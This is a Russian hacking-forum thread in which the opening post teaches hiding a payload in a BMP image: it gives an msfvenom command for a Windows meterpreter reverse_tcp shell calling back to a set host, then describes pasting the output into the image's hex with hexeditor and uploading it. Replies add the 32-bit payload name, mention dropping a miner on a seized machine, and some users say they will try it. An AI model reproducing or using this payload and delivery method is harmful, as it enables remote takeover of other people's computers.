• Начинающий хакер, спасибо что зашёл к нам! Для полного удобства рекомендуем Вам сразу же зарегистрироваться. Помните, необходимо придумать сложный пароль к своему логину, в котором будут присутствовать цифры, а так же символы. После регистрации вы сможете пользоваться чатом. Так же не забудьте активировать аккаунт через письмо, высланное вам на почту ! Администрация заботится о каждом из Вас...
  • Для просмотра разделов из категории Private Informations & Programms необходимо купить

Злая КАРТИНКА

  • Автор темы Автор темы baddagh
  • Дата начала Дата начала
  • Просмотры Просмотры 588

baddagh

Пользователь

baddagh

Пользователь
Местный
Местный
Регистрация
2 Авг 2017
Сообщения
56
Реакции
6
Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt





Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!





смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"






Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

 

Saitek

Пользователь

Saitek

Пользователь
Местный
Местный
Регистрация
19 Июн 2017
Сообщения
108
Реакции
17
Чет я допенькать не могу, н@хуй оно надо то xD
 

pe4onka34

Пользователь

pe4onka34

Пользователь
Местный
Местный
Регистрация
7 Авг 2017
Сообщения
20
Реакции
5
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD
тоже интересно, что же будет при открытии картинки.
 

Aceki

Повелитель клавиатуры

Aceki

Повелитель клавиатуры
Топовый
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Telegram
@Aceki
Уточнение - если вы создаёте payload для x32 системы используйте "windows/meterpreter/reverse_tcp" вместо "windows/x64/meterpreter/reverse_tcp"
 

Viskas1337

Пользователь

Viskas1337

Пользователь
Местный
Местный
Регистрация
27 Май 2017
Сообщения
22
Реакции
1
pe4onka34 написал(а):
тоже интересно, что же будет при открытии картинки.
ну по всей видимости, запуститься программа на сервере.
 

SoundX

Пользователь

SoundX

Пользователь
Пользователь
Пользователь
Регистрация
6 Авг 2017
Сообщения
20
Реакции
0
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD

Зохватит тачку. Заливает meterpreter в корень папки windows, а там можно и майнера закинуть. Это если я всё правильно понял.

Да и вообще, господа, вы странные. Сидите на форуме таком и даже в гугл заглянуть не судьба? Вы наверно даже о kali никогда не слышали и linux только в страшных снах видели? Я за 2 минуты гугления уже примерно понял что это за зверь и что примерно делает.
 
Последнее редактирование:

world

Пользователь

world

Пользователь
Местный
Местный
Регистрация
11 Июн 2017
Сообщения
39
Реакции
8
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
 

Saitek

Пользователь

Saitek

Пользователь
Местный
Местный
Регистрация
19 Июн 2017
Сообщения
108
Реакции
17
@SoundX, Малыш,не плачь, я знаю что ты "самый" умный. Я загуглил, понял что это, но смысл от этой картинки не понял
 

Aceki

Повелитель клавиатуры

Aceki

Повелитель клавиатуры
Топовый
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Telegram
@Aceki
Статья с сайта codeby. Чел, если ты берёшь статью с другого сайта ты сначала сам её прочитай. Это только первая часть статьи, вторую автор не написал. Так что не нужно такое выкладывать.
 

Aceki

Повелитель клавиатуры

Aceki

Повелитель клавиатуры
Топовый
Топовый
Регистрация
19 Янв 2017
Сообщения
966
Реакции
210
Telegram
@Aceki
Saitek написал(а):
Чет я допенькать не могу, н@хуй оно надо то xD

pe4onka34 написал(а):
тоже интересно, что же будет при открытии картинки.

world написал(а):
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
Почитал я комменты на codeby, там автор пишет что payload в картинке выполняется с помощью специального скрипта, который предварительно нужно загрузить на сервер.
Потом остаётся только сессию принять.
 

ARTE3M

Пользователь

ARTE3M

Пользователь
Пользователь
Пользователь
Регистрация
11 Авг 2017
Сообщения
35
Реакции
0
норм тема
 

SeMgA

Пользователь

SeMgA

Пользователь
Местный
Местный
Регистрация
30 Июл 2017
Сообщения
73
Реакции
11
Очень злая штука, сейчас будем пробовать!
 

Dmitry_DJ

Пользователь

Dmitry_DJ

Пользователь
Пользователь
Пользователь
Регистрация
14 Авг 2017
Сообщения
24
Реакции
16
Telegram
@DJ_VIANEX
очень интерестная схема
 

vaidas

Пользователь

vaidas

Пользователь
Пользователь
Пользователь
Регистрация
25 Май 2017
Сообщения
0
Реакции
0
бред какой то
 
Сверху Снизу